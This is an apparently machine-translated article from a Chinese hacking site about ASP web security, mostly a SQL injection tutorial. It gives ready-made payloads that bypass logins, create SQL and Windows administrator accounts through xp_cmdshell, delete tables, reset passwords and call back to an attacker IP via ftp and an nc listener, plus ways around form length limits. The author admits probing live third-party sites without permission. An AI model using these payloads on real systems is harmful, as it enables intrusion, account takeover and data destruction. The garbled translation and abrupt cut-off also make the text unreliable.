[ASP Development] [Intrusion Detection] Talking about SQL Injection Attack and Prevention

xiaoxiao2021-03-06 45

(http://www.cnhacker.cn/asp/list.asp?id=2184)

I have no systematic learning ASP or PHP programming, and there is no systematic learning of Access, SQLSERVER, MySQL and other databases, so I am not a programmer, although I often do some similar programmers. Because I want to build my own site, I have written three times, I also wrote a few thousand lines, coupled with some tests for some forums, message boards, and articles, and found some problems, now discuss now. When writing this article, I have conducted some tests on the XX security website, the ×× Municipal Talent Network, and the website of the XX network company in this article. apology! I am choosing the test started at 2:00 am, and I am only limited to the search operation, so I can surely say that there is almost no impact on your stations, with 1 hour traffic, slightly, I will give you a safety report, I want Will n't losing, huh, huh! 1, BAK file leak ASP source code Many editing tools, such as EditPlus, UltraEdit, by default, when saving files, will automatically back up one .bak file. If you create or edit the config.asp file, the editor will automatically generate a config.asp.bak file. If the file is not deleted, the attacker can pass http://www.bak/config.asp.bak To download the ASP source. You can imagine that your source program is downloaded, and the risk of being attacked is undoubtedly a lot. And if it is a configuration file, huh, user name, password, database name / location ... solution: either directly turn off the auto backup function of the editor, delete all .bak files when you upload it. 2, authentication is bypassed General Website There are many pages that require authentication to pass later, and these pages need to be verified again, but many programmers often ignore this. If an attacker knows the path and file name of these pages, you can bypass authentication and go directly to the page. Such as: You need to log in to the login.asp page and pass authentication to open the Manage.asp page. Attackers can enter the management interface directly through http://www.**.com/manage.asp. Workaround: Confirm the beginning of these pages. Such as: After authentication, pass a session ("login") = "ok", add the following to the program code: if session ("login") <> "t" the response.redirect "Login .asp "End If the above 2 points are the basic issues of programming, the focus of this article is discussed, and the SQL injection attack and prevention are discussed. 3, ASP program database password verification Vulnerability First, about the request object, we know, if you use the get method in the Form form, you should use the querystring collection to retrieve the form data; and use the POST method to pass the data, you should use form collection To retrieve form data. More programmers omitted the collection name directly, use the request ("data") to retrieve data, seem simple, actually efficient, and easy to errors.

The order of the ASP default search collection is queryString, Form, cookie, Serverariable, when discovers the first matching variable, it is determined as members you want to access. Therefore, it is recommended that you don't use this method. After you have finished writing, we turn to the topic. First look at the login.asp file, the following is the program code: ...

Username Password ... then look at the verify.asp file The following is the program code: ... DIM RS, Sqldim Name, PWDNAME = Request.form (" Name ") PWD = Request.form (" PWD ") IF Name = "" or PWD = "" Then Response.Redirect "Login.asp" end if ... 'About authentication sql = "select * from user where name ='" & name & "'and pwd ='" & pwd & "" " ... Don't think that no one will write this way, I have seen a lot, if you believe me :), look at the attacker what can do: (1) We entered [Admin 'or 1 =' 1] in the username location, Enter [11] in the cryptographic area. Note: The content is only []. See what SQL will become: The following is the program code: SQL = SELECT * from user where name = 'admin' or 1 = '1' and pwd = '11 'We know that OR is a logical operator, in judgment When multiple conditions, as long as there is an established, the equation returns to true. The back and the back is no longer judged, that is, we have bypass password verification, as long as we know the username, you can log in to the system. (2) We can also enter [Admin '-] in the username location, enter [11] in the cryptographic area. Take a look at SQL: The following is the program code: SQL = SELECT * from user where name = 'admin' - 'and PASWORD = '11' Similarly, through the connection - comment out the back password verification, the Access database invalid.

(3) If you can release the latter verification by connecting, then it is more interesting, to see what we can do: A. Enter [admin "in the username; exec master.dbo.sp_addlogin cool; -], Add a SQL user B. Enter [admin "in the username; exec master.dbo.sp_password null, 123456, cool; -], set the password to the COOL to 123456 C, enter [admin" in the username location; Exec Master .dbo.sp_addsrvrolemember cool, sysadmin; -】 Give Cool to System Administrator permission D, enter [admin "in the username location [admin"; Exec Master.dbo.xp_cmdshell 'Net User Cool 123456 / Workstations: * / Times: All / Passwordchg : Yes / PasswordReq: Yes / Active: Yes / Add '; -] Add a password to the system to 123456 account COOL, and set the relevant properties, and the NET user command can refer to here. E, enter [admin "in the username position [admin"; exec master.dbo.xp_cmdshell 'net localgroup administratrs cool / add'; -] Add Cool users to the administrators group. Now I feel horrible, of course, I haven't finished it yet, implementing these sites using SA or SYSTEM ADMINISTRATOR privileges to connect to the database, and ordinary virtual spaces do not think, unless the administrator is SB. But it is hard to say for those sites on their own server, it is really hard to say, huh, huh, I have seen N. If it is not sa, if you can't do anything, of course! Just get too high privileges to control the SQL library and the system, but we have a complete administrative authority to this library. Take a look at what we can do: a, enter [admin "; delete user; -], once his table name is User, you will delete all records in the USER table. Enough! Don't do this! B, enter [admin "; INSERT INTO USER (Name, PWD) VALUES ('Cool', '123456'); -], you can add a user to the USER table, of course, the premise is that the table name and field name are correct. C, enter [admin "; Update News Set PWD = '123456' where name = 'admin'; -], you can modify the password of Admin, and of course, the premise is also correct to the table name and field name. More attack content, you can refer to SQL syntax. It seems that if it is not SA or depressed, of course, we also have some simple way to determine if the website uses SA to connect to the database. A. Perform NC -L -P 21 in CMD to listen to the 21 port of this machine; of course, the firewall can be used.

b, enter [admin "; exec master.dbo.xp_cmdshell 'ftp *. *. *. *'], where * represents your IP address, if you find a connection, you can conclude that you use SA, and you can get the site The database's IP address, because some websites Web and SQL are placed on different servers; if they are not connected, the website is used by the non-SA account. Some friends may have already seen. If the website is uses SA, we can initiate a connection from the internal page, you can construct an FTP script, or use TFTP to upload files, even if there is a firewall. Maybe some friends will say that people have been the maximum length in the form, you can't enter so much! Nothing, it's hard to fall. Method 1: a, open the website page http:///www.***.com/login.asp, view the source file, put the submission form part as the program code: Username password copy, save login.htm b, modify the action for http: // www ***. com / verify.asp, ie: The following is the program code: User Name password Note: Some websites here are empty, you need you to slowly find him to submit it there, huh, I have encountered this situation, generally can be found.

c, modify MaxLength, increase, increase, or delete! D. Submission variable method from local: COOL.REG9X users: The following content is program code: regedit4 [hkey_current_user / soft / microsoft / Internet explorer / menuext / increase> @ = "c: //cool.htm" " Contexts "= dword: 000000042K users: The following is the program code: Windows registry editor version 5.00 [hkey_current_user / software / microsoft / Internet explorer / menuext / increase" @ = "c: //cool.htm" "contexts" = dword: 00000004Cool.htm Code for the following: